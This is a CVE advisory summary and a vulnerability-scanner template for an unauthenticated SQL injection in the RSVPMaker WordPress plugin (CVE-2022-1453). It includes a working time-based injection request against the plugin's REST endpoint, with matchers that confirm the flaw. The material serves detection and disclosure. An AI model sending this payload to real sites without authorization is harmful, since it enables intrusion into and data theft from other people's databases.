The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.
PoC
id: CVE-2022-1453
info:
name: RSVPMaker <= 9.2.5 - SQL Injection
author: Shivam Kamboj
severity: critical
description: |
The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.
impact: |
Attackers can retrieve sensitive data from the database without authentication, leading to data breach and privacy violations.
remediation: |
Update to version 9.2.6, or later
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection
- https://nvd.nist.gov/vuln/detail/CVE-2022-1453
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1453
epss-score: 0.071
epss-percentile: 0.93904
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,rsvpmaker,vkev
http:
- raw:
- |
@timeout: 30s
GET /wp-json/rsvpmaker/v1/sked/1?post_id=(SELECT%209999%20FROM%20(SELECT(SLEEP(7)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 7'
- 'status_code == 200'
- 'regex("false$", body)'
- 'contains(content_type, "application/json")'
condition: and
# digest: 490a00463044022053265d5c18e5453585e7e8efc6883cf415fb09bf9208408bed2b1b7aca4b94d602203bb755195b26aa3cc97755c337c2777d97ff51a9b1c0341d67287a979947519a:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.